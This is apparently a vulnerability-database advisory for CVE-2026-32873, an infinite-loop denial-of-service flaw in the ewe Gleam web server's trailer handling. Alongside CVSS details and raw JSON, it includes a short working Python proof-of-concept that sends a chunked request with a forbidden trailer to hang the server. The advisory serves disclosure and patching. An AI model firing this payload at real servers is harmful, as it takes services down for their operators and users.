Security Vulnerability Report
中文
CVE-2026-32873 CVSS 7.5 HIGH

CVE-2026-32873

Published: 2026-03-20 02:16:36
Last Modified: 2026-04-16 13:27:25
Source: [email protected]

Description

ewe is a Gleam web server. Versions 0.8.0 through 3.0.4 contain a bug in the handle_trailers function where rejected trailer headers (forbidden or undeclared) cause an infinite loop. When handle_trailers encounters such a trailer, three code paths (lines 520, 523, 526) recurse with the original buffer (rest) instead of advancing past the rejected header (Buffer(header_rest, 0)), causing decoder.decode_packet to re-parse the same header on every iteration. The resulting loop has no timeout or escape — the BEAM process permanently wedges at 100% CPU. Any application that calls ewe.read_body on chunked requests is affected, and this is exploitable by any unauthenticated remote client before control returns to application code, making an application-level workaround impossible. This issue is fixed in version 3.0.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:* - VULNERABLE
ewe 0.8.0 - 3.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # PoC for CVE-2026-32873 # This script sends a chunked HTTP request with a forbidden trailer # to trigger the infinite loop in the 'ewe' server. def trigger_dos(host, port): payload = ( "POST / HTTP/1.1\r\n" f"Host: {host}\r\n" "Transfer-Encoding: chunked\r\n" "\r\n" "4\r\n" "Test\r\n" "0\r\n" "Forbidden-Header: value\r\n" # Malicious trailer "\r\n" ) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((host, port)) s.sendall(payload.encode()) print("[+] Payload sent. Server CPU should spike to 100%.") except Exception as e: print(f"[-] Error: {e}") finally: s.close()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32873", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:35.540", "lastModified": "2026-04-16T13:27:24.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ewe is a Gleam web server. Versions 0.8.0 through 3.0.4 contain a bug in the handle_trailers function where rejected trailer headers (forbidden or undeclared) cause an infinite loop. When handle_trailers encounters such a trailer, three code paths (lines 520, 523, 526) recurse with the original buffer (rest) instead of advancing past the rejected header (Buffer(header_rest, 0)), causing decoder.decode_packet to re-parse the same header on every iteration. The resulting loop has no timeout or escape — the BEAM process permanently wedges at 100% CPU. Any application that calls ewe.read_body on chunked requests is affected, and this is exploitable by any unauthenticated remote client before control returns to application code, making an application-level workaround impossible. This issue is fixed in version 3.0.5."}, {"lang": "es", "value": "ewe es un servidor web Gleam. Las versiones 0.8.0 a 3.0.4 contienen un error en la función handle_trailers donde los encabezados de tráiler rechazados (prohibidos o no declarados) causan un bucle infinito. Cuando handle_trailers encuentra un tráiler de este tipo, tres rutas de código (líneas 520, 523, 526) recursan con el búfer original (rest) en lugar de avanzar más allá del encabezado rechazado (Buffer(header_rest, 0)), lo que provoca que decoder.decode_packet vuelva a analizar el mismo encabezado en cada iteración. El bucle resultante no tiene tiempo de espera ni escape — el proceso BEAM se atasca permanentemente al 100% de CPU. Cualquier aplicación que llama a ewe.read_body en solicitudes fragmentadas se ve afectada, y esto es explotable por cualquier cliente remoto no autenticado antes de que el control regrese al código de la aplicación, lo que hace imposible una solución alternativa a nivel de aplicación. Este problema está solucionado en la versión 3.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-825"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8.0", "versionEndExcluding": "3.0.5", "matchCriteriaId": "9825AC91-47D7-4F40-A582-AB13FF203293"}]}]}], "references": [{"url": "https://github.com/vshakitskiy/ewe/commit/8513de9dcdd0005f727c0f6f15dd89f8d626f560", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vshakitskiy/ewe/commit/d8b9b8a86470c0cb5696647997c2f34763506e37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-4w98-xf39-23gp", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-4w98-xf39-23gp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.